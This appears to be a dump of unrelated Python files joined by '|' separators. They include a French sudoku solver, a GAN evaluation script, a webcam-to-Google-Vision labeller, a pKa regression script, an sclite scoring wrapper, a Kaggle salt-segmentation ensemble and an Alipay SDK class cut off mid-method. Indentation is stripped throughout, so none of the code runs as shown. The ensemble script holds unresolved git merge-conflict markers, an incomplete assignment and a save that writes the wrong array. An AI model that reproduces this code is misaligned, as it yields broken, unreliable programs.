#il faudrais chercher une solution non recursive, en utilisant la vrai logique sudoku
copies=list()
res=[[]]
def resoudre(grille,conteur):
#un conteur qui est incrementé a chaque passage de la definition
global res
#pour pouvoir return la grille, il faut une variable globale
if not est_valide(grille):
grille_copie=copier(grille)
for ligne in range(9):
for colonne in range(9):
M=remplie_M(grille_copie)
if M[ligne][colonne].count(0)==2:
chiffre=M[ligne][colonne].index(0)+1
grille_copie[ligne][colonne]=chiffre
copies.append(copier(grille_copie))
if not est_resolvable(grille_copie):
chiffre=M[ligne][colonne].index(0,chiffre)+1
grille_copie[ligne][colonne]=chiffre
if est_resolvable(grille_copie):
#si notre grille est resolvable, on est la dedans
remplie_grille(grille_copie)
res=copier(grille_copie)
return res
conteur +=1
resoudre(copies[conteur],conteur)
return res
#prend une grille remplie en parametre et on enleve aléatoirement environ
# un quart des chiffre
def partielle(grille):
grille_copie=copier(grille)
for ligne in range(9):
for colonne in range(9):
r=int(random()*4)
if r==0:
grille_copie[ligne][colonne]=0
return grille_copie
if __name__ == "__main__":
#---------------------interactif-------------------------
print("bonjour, que souhaitez vous? (tapez le numero correspondant)")
print("1/ Afficher une grille sudoku")
print("2/ Resoudre partiellement votre grille")
print("3/ Resoudre totalement votre grille")
print("4/ saisir une grille sudoku")
print("0/ Quitter")
n='c'
grille_principale=[[int for i in range(9)]for j in range(9)]
grille_complete=[[int for i in range(9)]for j in range(9)]
while n != '0':
n=input(" :: ")
if n == '1':
ligne=int(random()*245 + 1)
grille_principale=liste_to_grille(lire_fichier_sudoku('sudoku.txt',ligne))
print("grille numero: "+str(ligne))
afficher_sudoku(grille_principale)
grille_complete=resoudre(grille_principale,-1)
elif n =='2':
print("grille partielle : ")
part=partielle(grille_complete)
afficher_sudoku(part)
elif n=='3':
print("grille_complete")
afficher_sudoku(grille_complete)
elif n=='4':
grille_principale=liste_to_grille(saisir_sudoku())
grille_complete=resoudre(grille_principale,-1)
|
import pandas as pd
import json
import os.path
TEXT_EXTENSION = ".txt"
TRUTH_EXTENSION = ".truth"
PROBLEM_PREFIX = "problem-"
DIR = "../training_external/"
TEXT_AS_INDEX = "text"
POSITION_AS_INDEX = "positions"
ITERATIONS = 300000 # it depends on the total number of files
FEATHER_FILE = "external_data_feather"
skeleton = {TEXT_AS_INDEX: [], POSITION_AS_INDEX: []}
data = pd.DataFrame(skeleton)
for file_id in range(1, ITERATIONS):
TRAIN_FILE = DIR + PROBLEM_PREFIX + str(file_id) + TEXT_EXTENSION
if os.path.isfile(TRAIN_FILE):
TRUTH_FILE = DIR + PROBLEM_PREFIX + str(file_id) + TRUTH_EXTENSION
temporary_file = json.load(open(TRUTH_FILE))
positions = ','.join(str(position) for (position) in temporary_file[POSITION_AS_INDEX])
with open(TRAIN_FILE, 'r') as content_file:
content = content_file.read()
bufferDataFrame = pd.DataFrame({TEXT_AS_INDEX: [content], POSITION_AS_INDEX: [positions]})
data = data.append(bufferDataFrame)
if file_id % 10000 == 0:
print(file_id)
data.reset_index().to_feather(FEATHER_FILE)
print("DONE")
|
import os
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torchvision import datasets
import torchvision.transforms as transforms
import torchvision.utils as vutils
import numpy as np
import matplotlib.pyplot as plt
from shutil import rmtree
import args
import util
from models import fcgan
from eval import fid_score
def set_random_seed(seed=23):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(seed)
random.seed(seed)
def main():
#set_random_seed()
# Change the following comments for CPU
#device, gpu_ids = util.get_available_devices()
device = torch.device('cpu')
# Arguments
opt = args.get_setup_args()
num_classes = opt.num_classes
noise_dim = opt.latent_dim + opt.num_classes
train_images_path = os.path.join(opt.data_path, "train")
output_train_images_path = train_images_path + "_" + str(opt.img_size)
output_sample_images_path = os.path.join(opt.output_path, opt.version, "sample_eval")
output_nn_pixel_images_path = os.path.join(opt.output_path, opt.version, "nn_eval_pixel")
output_nn_inception_images_path = os.path.join(opt.output_path, opt.version, "nn_eval_inception")
os.makedirs(output_sample_images_path, exist_ok=True)
os.makedirs(output_nn_pixel_images_path, exist_ok=True)
#os.makedirs(output_nn_inception_images_path, exist_ok=True)
def get_nn_pixels(sample_images, train_images):
nn = [None]*len(sample_images)
pdist = torch.nn.PairwiseDistance(p=2)
N, C, H, W = train_images.shape
for i in range(len(sample_images)):
sample_image = sample_images[i].unsqueeze(0)
sample_image = torch.cat(N*[sample_image])
distances = pdist(sample_image.view(-1, C*H*W), train_images.view(-1, C*H*W))
min_index = torch.argmin(distances)
nn[i] = train_images[min_index]
r = torch.stack(nn, dim=0).squeeze().to(device)
return r
def get_nn_inception(sample_activations, train_activations, train_images):
nn = [None]*len(sample_activations)
pdist = torch.nn.PairwiseDistance(p=2)
N = train_activations.size(0)
for i in range(len(sample_activations)):
sample_act = sample_activations[i].unsqueeze(0)
sample_act = torch.cat(N*[sample_act])
distances = pdist(sample_act, train_activations)
min_index = torch.argmin(distances)
nn[i] = train_images[min_index]
r = torch.stack(nn, dim=0).squeeze().to(device)
return r
def get_nearest_neighbour_pixels(sample_images, num_images, train_images, train_labels):
all_nn = []
for i in range(num_classes):
train_imgs = train_images[train_labels[:] == i]
nearest_n = get_nn_pixels(sample_images[i*num_images:(i+1)*num_images], train_imgs)
class_nn = torch.stack([sample_images[i*num_images:(i+1)*num_images], nearest_n], dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
all_nn.append(class_nn)
#r = torch.stack(nn, dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
#print(r.shape)
return all_nn
def get_nearest_neighbour_inception(sample_images, num_images, train_images, train_labels):
print("Getting sample activations...")
sample_activations = fid_score.get_activations_given_path(output_sample_images_path, opt.batch_size, device)
sample_activations = torch.from_numpy(sample_activations).type(torch.FloatTensor).to(device)
print("Getting train activations...")
train_activations = fid_score.get_activations_given_path(output_train_images_path, opt.batch_size, device)
train_activations = torch.from_numpy(train_activations).type(torch.FloatTensor).to(device)
all_nn = []
for i in range(num_classes):
train_imgs = train_images[train_labels[:] == i]
train_act = train_activations[train_labels[:] == i]
nearest_n = get_nn_inception(sample_activations[i*num_images:(i+1)*num_images], train_act, train_images)
class_nn = torch.stack([sample_images[i*num_images:(i+1)*num_images], nearest_n], dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
all_nn.append(class_nn)
#r = torch.stack(nn, dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
#print(r.shape)
return all_nn
def get_onehot_labels(num_images):
labels = torch.zeros(num_images, 1).to(device)
for i in range(num_classes - 1):
temp = torch.ones(num_images, 1).to(device) + i
labels = torch.cat([labels, temp], 0)
labels_onehot = torch.zeros(num_images * num_classes, num_classes).to(device)
labels_onehot.scatter_(1, labels.to(torch.long), 1)
return labels_onehot
def sample_images(num_images, itr):
'''
labels = torch.zeros((num_classes * num_images,), dtype=torch.long).to(device)
for i in range(num_classes):
for j in range(num_images):
labels[i*num_images + j] = i
labels_onehot = F.one_hot(labels, num_classes)
'''
train_set = datasets.ImageFolder(root=train_images_path,
transform=transforms.Compose([
transforms.Resize((opt.img_size, opt.img_size)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
]))
'''
source_images_available = True
if (not os.path.exists(output_train_images_path)):
os.makedirs(output_train_images_path)
source_images_available = False
if (not source_images_available):
train_loader = torch.utils.data.DataLoader(train_set,
batch_size=1,
num_workers=opt.num_workers)
else:
train_loader = torch.utils.data.DataLoader(train_set,
batch_size=opt.batch_size,
num_workers=opt.num_workers)
'''
train_loader = torch.utils.data.DataLoader(train_set,
batch_size=opt.batch_size,
num_workers=opt.num_workers)
train_images = torch.FloatTensor().to(device)
train_labels = torch.LongTensor().to(device)
print("Loading train images...")
for i, data in enumerate(train_loader, 0):
img, label = data
img = img.to(device)
label = label.to(device)
train_images = torch.cat([train_images, img], 0)
train_labels = torch.cat([train_labels, label], 0)
#if (not source_images_available):
# vutils.save_image(img, "{}/{}.jpg".format(output_train_images_path, i), normalize=True)
print("Estimating nearest neighbors in pixel space, this takes a few minutes...")
for it in range(itr):
z = torch.randn((num_classes * num_images, opt.latent_dim)).to(device)
labels_onehot = get_onehot_labels(num_images)
z = torch.cat((z, labels_onehot.to(dtype=torch.float)), 1)
sample_imgs = gen(z)
for i in range(len(sample_imgs)):
vutils.save_image(sample_imgs[i], "{}/{}.png".format(output_sample_images_path, i), normalize=True)
nearest_neighbour_imgs_list = get_nearest_neighbour_pixels(sample_imgs, num_images, train_images, train_labels)
for label, nn_imgs in enumerate(nearest_neighbour_imgs_list):
vutils.save_image(nn_imgs.data, "{}/iter{}-{}.png".format(output_nn_pixel_images_path, it, label), nrow=num_images, padding=2, normalize=True)
print("Saved nearest neighbors.")
'''
print("Estimating nearest neighbors in feature space, this takes a few minutes...")
nearest_neighbour_imgs_list = get_nearest_neighbour_inception(sample_imgs, num_images, train_images, train_labels)
for label, nn_imgs in enumerate(nearest_neighbour_imgs_list):
vutils.save_image(nn_imgs.data, "{}/{}.png".format(output_nn_inception_images_path, label), nrow=num_images, padding=2, normalize=True)
print("Saved nearest neighbors.")
'''
def eval_fid(gen_images_path, eval_images_path):
print("Calculating FID...")
fid = fid_score.calculate_fid_given_paths((gen_images_path, eval_images_path), opt.batch_size, device)
return fid
def evaluate(source_images_path, keep_images=True):
dataset = datasets.ImageFolder(root=source_images_path,
transform=transforms.Compose([
transforms.Resize((opt.img_size, opt.img_size)),
transforms.ToTensor()
]))
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers)
output_gen_images_path = os.path.join(opt.output_path, opt.version, opt.eval_mode)
os.makedirs(output_gen_images_path, exist_ok=True)
output_source_images_path = source_images_path + "_" + str(opt.img_size)
source_images_available = True
if (not os.path.exists(output_source_images_path)):
os.makedirs(output_source_images_path)
source_images_available = False
images_done = 0
for _, data in enumerate(dataloader, 0):
images, labels = data
batch_size = images.size(0)
noise = torch.randn((batch_size, opt.latent_dim)).to(device)
labels = torch.randint(0, num_classes, (batch_size,)).to(device)
labels_onehot = F.one_hot(labels, num_classes)
noise = torch.cat((noise, labels_onehot.to(dtype=torch.float)), 1)
gen_images = gen(noise)
for i in range(images_done, images_done + batch_size):
vutils.save_image(gen_images[i - images_done, :, :, :], "{}/{}.jpg".format(output_gen_images_path, i), normalize=True)
if (not source_images_available):
vutils.save_image(images[i - images_done, :, :, :], "{}/{}.jpg".format(output_source_images_path, i), normalize=True)
images_done += batch_size
fid = eval_fid(output_gen_images_path, output_source_images_path)
if (not keep_images):
print("Deleting images generated for validation...")
rmtree(output_gen_images_path)
return fid
test_images_path = os.path.join(opt.data_path, "test")
val_images_path = os.path.join(opt.data_path, "val")
model_path = os.path.join(opt.output_path, opt.version, opt.model_file)
gen = fcgan.Generator(noise_dim).to(device)
if (opt.model_file.endswith(".pt")):
gen.load_state_dict(torch.load(model_path, map_location=device))
elif (opt.model_file.endswith(".tar")):
checkpoint = torch.load(model_path, map_location=device)
gen.load_state_dict(checkpoint['g_state_dict'])
gen.eval()
if opt.eval_mode == "val":
source_images_path = val_images_path
elif opt.eval_mode == "test":
source_images_path = test_images_path
if opt.eval_mode == "val" or opt.eval_mode == "test":
print("Evaluating model...")
fid = evaluate(source_images_path)
print("FID: {}".format(fid))
elif opt.eval_mode == "nn":
sample_images(opt.num_sample_images, 50)
if __name__ == '__main__':
main()
|
from pygame.locals import *
import pygame.camera
pygame.init()
pygame.camera.init()
cam = pygame.camera.Camera("/dev/video0", (320, 180))
import io
import os
from google.cloud import vision
from google.cloud.vision import types
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "vision.json"
client = vision.ImageAnnotatorClient()
# The name of the image file to annotate
def process_image(image_name):
# Loads the image into memory
with io.open(image_name, 'rb') as image_file:
content = image_file.read()
image = types.Image(content=content)
# Performs label detection on the image file
response = client.label_detection(image=image)
labels = response.label_annotations
print('Labels:')
for label in labels:
print(label.description)
return [label.description for label in labels]
def capture(image_name="image.png"):
try:
os.remove(image_name)
except Exception as e:
print(e)
cam.start()
image = cam.get_image()
cam.stop()
pygame.image.save(image, image_name)
return image_name
def process():
print("processing")
try:
name = capture()
process_image(name)
except Exception as e:
print(e)
|
import numpy as np
import matplotlib.pyplot as plt
import xlwt
import sys
import numpy as np
from sklearn import preprocessing, cross_validation, svm
from sklearn.linear_model import LinearRegression
data=np.load(sys.argv[1]).item()
#data2=np.load('/Users/47510753/Documents/side_projects/B_final.npy').item()
#data['./B_4NH2_5NO2.out']=[['C-O',1.2451,9.976,1571.474],['C-O',1.2419,10.183,1587.718],['O-C-O',130.3039,1.874,906.507],4.19]
#data['./B_4NO2.out']=[['C-O',1.2426,10.12,1582.785],['C-O',1.2426,10.12,1582.785],['O-C-O',130.5321,1.862,904.86],3.43]
#data['./B_4OMe.out']=[['C-O',1.2454,9.986,1572.314],['C-O',1.2454,9.999,1573.321],['O-C-O',129.6075,1.904,910.652],4.5]
np.save(sys.argv[1],data)
def add_pka(data,name):
data2=np.load(sys.argv[2]).item()
ne={}
for i in data:
a,b=data[i]
d=data2[i.split('/')[-1].split('.')[0]][-1]
data[i].append(d)
ne[i]=data[i]
print ne,len(ne)
if raw_input('Save : ')=='y':
np.save(name,ne)
def add_pka_manually(data,name):
f=open('res.txt','r')
lines=f.readlines()
f.close()
ne={}
for line in lines:
nam=line.strip().split()
ne[nam[4].split('/')[-1]]=data[nam[4]]+[nam[6]]
print ne
'''
for i in data:
if '.g16' in i:
continue
ne[i]=data[i]+[float(raw_input('Enter pka : for '+i+' : '))]
print ne
'''
if raw_input('Save : ')=='y':
np.save(name,ne)
def make_excel(data,name):
wb=xlwt.Workbook()
sheet = wb.add_sheet('Version1')
sheet.write(0,0,'Filename')
sheet.write(0,1,'Qa1')
sheet.write(0,2,'Qa2')
sheet.write(0,3,'Qw')
sheet.write(0,4,'pKa')
row=1
for i in data:
if i in ['R_2-C2H5-Ar.out','R_CH2Br.out']:
continue
col=0
a,b,c,d=data[i]
sheet.write(row,col,i.split('/')[-1])
sheet.write(row,col+1,str(a[-1]))
sheet.write(row,col+2,str(b[-1]))
sheet.write(row,col+3,str(c[-1]))
sheet.write(row,col+4,str(d))
row+=1
wb.save(name)
def plot(data):
for i in data:
file.append(i.split('/')[-1])
a,b,c,d=data[i]
avg=(a[-1]+b[-1])/2
plt.plot(avg,d,'ro')
plt.show()
def make_fit1(data):
X,y=[],[]
file=[]
#ne={}
for i in data:
if i in ['R_2-C2H5-Ar.out','R_CH2Br.out']:
continue
file.append(i.split('/')[-1])
a,b,c,d=data[i]
#d=data2[i][-1]
#data[i].append(d)
#ne[i]=data[i]
a1=(float(a[-1])+float(b[-1]))/2
b1=float(c[-1])
X+=[[a1**2,b1**2,a1*b1,a1,b1]]
y+=[[float(d)]]
#avg=(a[-1]+b[-1])/2
#plt.plot(avg,d,'ro')
'''
print ne,len(ne)
if raw_input('Save : ')=='y':
np.save('B_final.npy',ne)
plt.show()
wb.save('Benzoic_acid.xls')
'''
#X_train, X_test, y_train, y_test= cross_validation.train_test_split(X,y,test_size=0.0)
clf = LinearRegression() #(n_jobs=processors)
clf.fit(X, y)
accuracy = clf.score(X,y)
print 'accuracy',accuracy,'\n'
pr=clf.predict(X)
print 'Filename Percentage Error Actual Value Predicted Value Difference\n'
for i in range (len(y)):
predi=str(round(((pr[i][0]-y[i][0])/y[i][0])*100,2))+' %'
print file[i]+' '*(20-len(file[i])),' '*(20-len(predi))+ predi, ' '*(20-len(str(y[i][0])))+str(y[i][0]) , ' '*(20-len(str(round(pr[i][0],2))))+str(round(pr[i][0],2)),' '*(20-len(str(round((y[i][0]-pr[i][0]),4))))+str(round((y[i][0]-pr[i][0]),4))
def make_fit2(data):
X,y=[],[]
file=[]
#ne={}
for i in data:
file.append(i.split('/')[-1])
a,b,d=data[i]
#d=data2[i][-1]
#data[i].append(d)
#ne[i]=data[i]
a1=float(a[-1])
b1=float(b[-1])
X+=[[a1**2,b1**2,a1*b1,a1,b1]]
y+=[[float(d)]]
clf = LinearRegression() #(n_jobs=processors)
clf.fit(X, y)
accuracy = clf.score(X,y)
print 'accuracy',accuracy,'\n'
pr=clf.predict(X)
print 'Filename Percentage Error Actual Value Predicted Value Difference\n'
for i in range (len(y)):
predi=str(round(((pr[i][0]-y[i][0])/y[i][0])*100,2))+' %'
print file[i]+' '*(20-len(file[i])),' '*(20-len(predi))+ predi, ' '*(20-len(str(y[i][0])))+str(y[i][0]) , ' '*(20-len(str(round(pr[i][0],2))))+str(round(pr[i][0],2)),' '*(20-len(str(round((y[i][0]-pr[i][0]),4))))+str(round((y[i][0]-pr[i][0]),4))
make_fit1(data) |
import subprocess, re
import os, platform
def tokenize(string):
return ' '.join(list(x.lower() for x in \
re.findall(r'[A-Za-z0-9\']+',
string)))
def score_sclite(hyp, ref):
_ref = tokenize(ref)
_hyp = tokenize(hyp)
#print (hyp)
#print ("poo")
#print ("Hypothesis" + str (_hyp))
with open("ref.ref", 'w') as f:
f .write(_ref + " (a)\n")
with open("hyp.hyp", 'w') as f:
f .write(_hyp + " (a)\n")
# platform-dependent shell command
#sclite_windows = ["sclitewin/sclite"]
sclite_windows = ["sclite"]
sclite_macosx = ["sclitemac/sclite"]
sclite_linux = ["sclitelin/sclite"]
cmd_args = ["-i", "spu_id",
"-o", "pralign",
"-r", "ref.ref",
"-h", "hyp.hyp",
"-n", "test"]
if platform.system() == "Windows":
cmd = sclite_windows + cmd_args
elif platform.system() == "Darwin":
cmd = sclite_macosx + cmd_args
elif platform.system() == "Linux":
cmd = sclite_linux + cmd_args
else:
return None
subprocess.call(cmd)
results = {}
with open("test.pra", 'r') as f:
text = f.readlines ()
numbers = text[11][22:].split(" ")
results['num'] = {'correct': numbers[0],
'substitutions': numbers[1],
'deletions': numbers [2],
'insertions': numbers [3]}
results['ref'] = text[12][6:].strip()
results['hyp'] = text[13][6:].strip()
#print(results)
denominator = int(results['num']['correct']) + \
int(results['num']['substitutions']) + \
int(results['num']['deletions'])
results['accuracy'] = str(100 * float (results['num']['correct'])\
/ (denominator))[:4]
os.remove("ref.ref")
os.remove("hyp.hyp")
os.remove("test.pra")
return results
|
import os
import sys
sys.path.append('../../../')
import pandas as pd
from dependencies import *
from settings import *
from reproducibility import *
from models.TGS_salt.Unet34_scSE_hyper import Unet_scSE_hyper as Net
import pickle
from tqdm import tqdm
from bunny import bunny
mode = "100models_weighted"
TUNE=True
df = pd.read_csv("stable.csv")
file_list = list(df["Unnamed: 0"])
print(file_list)
preds1=None
preds2=None
preds3=None
preds4=None
file_list_2 = glob.glob(os.path.join('/home/liaop20/ml-arsenal/projects/TGS_salt/ocnet256',"*.p"))
#file_list = [f.split('/')[-1].split('.npy')[0] for f in file_list]
test_path = os.path.join("/home/liaop20/data/salt", 'test')
#test_path = os.path.join("/data/kaggle/salt", 'test')
test_file_list = glob.glob(os.path.join(test_path, 'images', '*.png'))
test_file_list = [f.split('/')[-1].split('.')[0] for f in test_file_list]
print(test_file_list[:3])
height, width = 101, 101
if height % 32 == 0:
y_min_pad = 0
y_max_pad = 0
else:
y_pad = 32 - height % 32
y_min_pad = int(y_pad / 2)
y_max_pad = y_pad - y_min_pad
if width % 32 == 0:
x_min_pad = 0
x_max_pad = 0
else:
x_pad = 32 - width % 32
x_min_pad = int(x_pad / 2)
x_max_pad = x_pad - x_min_pad
<<<<<<< HEAD
#R1='/home/liaop20/ml-arsenal/projects/TGS_salt/100models/'
#R2='/home/liaop20/ml-arsenal/projects/TGS_salt/ocnet/'
R1="/data/liao_checkpoints/100models/"
R2="/data/liao_checkpoints/ocnet/"
R3=
=======
height1, width1 = 202, 202
if height1 % 256 == 0:
y_min_pad1 = 0
y_max_pad1 = 0
else:
y_pad1 = 256 - height1 % 256
y_min_pad1 = int(y_pad1 / 2)
y_max_pad1 = y_pad1 - y_min_pad1
if width1 % 256 == 0:
x_min_pad1 = 0
x_max_pad1 = 0
else:
x_pad1 = 256 - width1 % 256
x_min_pad1 = int(x_pad1 / 2)
x_max_pad1 = x_pad1 - x_min_pad1
R1='/data/liao_checkpoints/100models/'
R2='/data/liao_checkpoints/ocnet/'
R3='/data/liao_checkpoints/ocnet256/'
#R1="/data/liao_checkpoints/100models/"
#R2="/data/liao_checkpoints/ocnet/"
>>>>>>> 8006bb3b316278a44ddec10efcea2a29bb76b9b2
#1_ResNet34_res_25600029500_model.p
#ResNet34_res_256_fold200119500_model.p'
ct1=0
ct2=0
ct3=0
ct4=0
if TUNE:
"""
for file1 in tqdm(file_list_2):
sigmoid_4 = np.load(file1)/255
ct4=ct4+1
if preds4 is None:
preds4=sigmoid_4
#print(preds4.shape)
else:
preds4=preds4+sigmoid_4
print(preds4.mean()/ct4)
"""
for file1 in tqdm(file_list):
#sigmoids=pickle.load(open(file1+".p","rb"))
#print(file1)
model = ""
if file1.find("OCnet")==-1 and file1.find("256")!=-1:
fold = file1[file1.find("fold")+4:file1.find("fold")+5]
checkpt= file1[file1.find("fold")+5:file1.find("_simu")]
#size = file1
sigmoids_1=pickle.load(open(R1+fold+"_ResNet34_res_256"+checkpt+"_model.p","rb"))
images=[]
for i in range(18000):
img = cv2.resize(sigmoids_1[i,:,:],(101,101))
images.append(img)
sigmoids_1 = np.array(images)
ct1=ct1+1
model = "256"
elif file1.find("OCnet")== -1:
fold = file1[file1.find("fold")+4:file1.find("fold")+5]
checkpt= file1[file1.find("fold")+5:file1.find("_simu")]
#size = file1
sigmoids_2=pickle.load(open(R1+fold+"_ResNet34_res_256"+checkpt+"_model.p","rb"))
images=[]
for i in range(18000):
img = cv2.resize(sigmoids_2[i,:,:],(101,101))
images.append(img)
sigmoids_2 = np.array(images)
ct2=ct2+1
model = "128"
<<<<<<< HEAD
elif file1.find("OCnet")!= -1:
fold = file1[file1.find("fold")+4:file1.find("fold")+5]
checkpt= file1[file1.find("fold")+5:file1.find("_simu")]
#size = file1
sigmoids_4=pickle.load(open(R1+fold+"_ResNet34_res_256"+checkpt+"_model.p","rb"))
=======
elif file1.find("OCnet256")!=-1:
fold= file1[file1.find("fold")+4:file1.find("fold")+5]
checkpt= file1[file1.find("fold")+5:file1.find("_simu")]
sigmoids_4=pickle.load(open(R3+"ocnet256"+fold+checkpt+".p","rb"))
sigmoids_4=sigmoids_4[:, y_min_pad1:256 - y_max_pad1, x_min_pad1:256 - x_max_pad1]
>>>>>>> 8006bb3b316278a44ddec10efcea2a29bb76b9b2
images=[]
for i in range(18000):
img = cv2.resize(sigmoids_4[i,:,:],(101,101))
images.append(img)
sigmoids_4 = np.array(images)
<<<<<<< HEAD
=======
>>>>>>> 8006bb3b316278a44ddec10efcea2a29bb76b9b2
ct4=ct4+1
model = "ocnet256"
else:
fold= file1[file1.find("fold")+4:file1.find("fold")+5]
checkpt= file1[file1.find("fold")+5:file1.find("_simu")]
sigmoids_3=pickle.load(open(R2+"ocnet"+fold+checkpt+".p","rb"))
sigmoids_3=sigmoids_3[:, y_min_pad:128 - y_max_pad, x_min_pad:128 - x_max_pad]
ct3=ct3+1
model = "ocnet"
i=0
if preds1 is None and model == "256":
i=i+1
preds1=sigmoids_1
elif model == "256":
i=i+1
preds1=preds1+sigmoids_1
print(preds1.mean()/ct1)
if preds2 is None and model == "128":
i=i+1
preds2=sigmoids_2
elif model == "128":
i=i+1
preds2=preds2+sigmoids_2
print(preds2.mean()/ct2)
if preds3 is None and model == "ocnet":
i=i+1
preds3=sigmoids_3
elif model=="ocnet":
i=i+1
preds3=preds3+sigmoids_3
print(preds3.mean()/ct3)
if preds4 is None and model == "ocnet256":
i=i+1
preds4=sigmoids_4
elif model=="ocnet256":
i=i+1
preds4=preds4+sigmoids_4
print(preds4.mean()/ct4)
assert(i==1)
preds1=preds1/ct1
preds2=preds2/ct2
preds3=preds3/ct3
preds4=preds4/ct4
pickle.dump(preds1,open( mode+"_sum_all_sigmoids_1.p","wb"))
pickle.dump(preds2,open( mode+"_sum_all_sigmoids_2.p","wb"))
pickle.dump(preds3,open( mode+"_sum_all_sigmoids_3.p","wb"))
pickle.dump(preds3,open( mode+"_sum_all_sigmoids_4.p","wb"))
if not(TUNE):
preds1=pickle.load(open( mode+"_sum_all_sigmoids_1.p","rb"))
preds2=pickle.load(open( mode+"_sum_all_sigmoids_2.p","rb"))
preds3=pickle.load(open( mode+"_sum_all_sigmoids_3.p","rb"))
preds4=pickle.load(open( mode+"_sum_all_sigmoids_4.p","rb"))
"""
print(tuple2)
preds1 = tuple1[0]
ct1= tuple1[1]
preds2 = tuple2[0]
ct2= tuple2[1]
preds3 = tuple3[0]
ct3= tuple3[1]
print(preds1[0].shape)
print((ct1,ct2,ct3))
print(preds2)
for i in tqdm(range(len(preds1))):
preds1[i,:,:]/=ct1
preds2[i,:,:]/=ct2
preds3[i,:,:]/=ct3
#preds1=np.true_divide(preds1[0],ct1)
#preds2=np.true_divide(preds2,ct2)
#preds3=np.true_divide(preds3,ct3)
"""
print(preds1.mean())
print(preds2.mean())
print(preds3.mean())
print(preds4.mean())
preds = preds1*0.35+preds2*0.1+preds3*0.1+preds4*0.45
print(preds.mean())
pickle.dump(preds,open("stable_all_sigmoids.p","wb"))
threshold = 0.45
binary_prediction = (preds > threshold).astype(int)
def rle_encoding(x):
dots = np.where(x.T.flatten() == 1)[0]
run_lengths = []
prev = -2
for b in dots:
if (b > prev+1): run_lengths.extend((b + 1, 0))
run_lengths[-1] += 1
prev = b
return run_lengths
all_masks = []
for p_mask in list(binary_prediction):
p_mask = rle_encoding(p_mask)
all_masks.append(' '.join(map(str, p_mask)))
submit = pd.DataFrame([test_file_list, all_masks]).T
submit.columns = ['id', 'rle_mask']
submit.to_csv('./100_stable_models_weighted.csv', index = False)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class EsignResult(object):
def __init__(self):
self._agreement_id = None
self._agreement_url = None
self._apply_dutiable_mode_enum = None
self._contractor_code = None
self._contractor_name = None
self._employee_alipay_logon_id = None
self._employer_code = None
self._identification_in_belonging_employer = None
self._out_biz_no = None
self._pay_salary_mode_enum = None
self._sign_time = None
self._status = None
self._tax_optimization_mode = None
self._termination_time = None
self._two_party_status = None
@property
def agreement_id(self):
return self._agreement_id
@agreement_id.setter
def agreement_id(self, value):
self._agreement_id = value
@property
def agreement_url(self):
return self._agreement_url
@agreement_url.setter
def agreement_url(self, value):
self._agreement_url = value
@property
def apply_dutiable_mode_enum(self):
return self._apply_dutiable_mode_enum
@apply_dutiable_mode_enum.setter
def apply_dutiable_mode_enum(self, value):
self._apply_dutiable_mode_enum = value
@property
def contractor_code(self):
return self._contractor_code
@contractor_code.setter
def contractor_code(self, value):
self._contractor_code = value
@property
def contractor_name(self):
return self._contractor_name
@contractor_name.setter
def contractor_name(self, value):
self._contractor_name = value
@property
def employee_alipay_logon_id(self):
return self._employee_alipay_logon_id
@employee_alipay_logon_id.setter
def employee_alipay_logon_id(self, value):
self._employee_alipay_logon_id = value
@property
def employer_code(self):
return self._employer_code
@employer_code.setter
def employer_code(self, value):
self._employer_code = value
@property
def identification_in_belonging_employer(self):
return self._identification_in_belonging_employer
@identification_in_belonging_employer.setter
def identification_in_belonging_employer(self, value):
self._identification_in_belonging_employer = value
@property
def out_biz_no(self):
return self._out_biz_no
@out_biz_no.setter
def out_biz_no(self, value):
self._out_biz_no = value
@property
def pay_salary_mode_enum(self):
return self._pay_salary_mode_enum
@pay_salary_mode_enum.setter
def pay_salary_mode_enum(self, value):
self._pay_salary_mode_enum = value
@property
def sign_time(self):
return self._sign_time
@sign_time.setter
def sign_time(self, value):
self._sign_time = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def tax_optimization_mode(self):
return self._tax_optimization_mode
@tax_optimization_mode.setter
def tax_optimization_mode(self, value):
self._tax_optimization_mode = value
@property
def termination_time(self):
return self._termination_time
@termination_time.setter
def termination_time(self, value):
self._termination_time = value
@property
def two_party_status(self):
return self._two_party_status
@two_party_status.setter
def two_party_status(self, value):
self._two_party_status = value
def to_alipay_dict(self):
params = dict()
if self.agreement_id:
if hasattr(self.agreement_id, 'to_alipay_dict'):
params['agreement_id'] = self.agreement_id.to_alipay_dict()
else:
params['agreement_id'] = self.agreement_id
if self.agreement_url:
if hasattr(self.agreement_url, 'to_alipay_dict'):
params['agreement_url'] = self.agreement_url.to_alipay_dict()
else:
params['agreement_url'] = self.agreement_url
if self.apply_dutiable_mode_enum:
if hasattr(self.apply_dutiable_mode_enum, 'to_alipay_dict'):
params['apply_dutiable_mode_enum'] = self.apply_dutiable_mode_enum.to_alipay_dict()
else:
params['apply_dutiable_mode_enum'] = self.apply_dutiable_mode_enum
if self.contractor_code:
if hasattr(self.contractor_code, 'to_alipay_dict'):
params['contractor_code'] = self.contractor_code.to_alipay_dict()
else:
params['contractor_code'] = self.contractor_code
if self.contractor_name:
if hasattr(self.contractor_name, 'to_alipay_dict'):
params['contractor_name'] = self.contractor_name.to_alipay_dict()
else:
params['contractor_name'] = self.contractor_name
if self.employee_alipay_logon_id:
if hasattr(self.employee_alipay_logon_id, 'to_alipay_dict'):
params['employee_alipay_logon_id'] = self.employee_alipay_logon_id.to_alipay_dict()
else:
params['employee_alipay_logon_id'] = self.employee_alipay_logon_id
if self.employer_code:
if hasattr(self.employer_code, 'to_alipay_dict'):
params['employer_code'] = self.employer_code.to_alipay_dict()
else:
params['employer_code'] = self.employer_code
if self.identification_in_belonging_employer:
if hasattr(self.identification_in_belonging_employer, 'to_alipay_dict'):
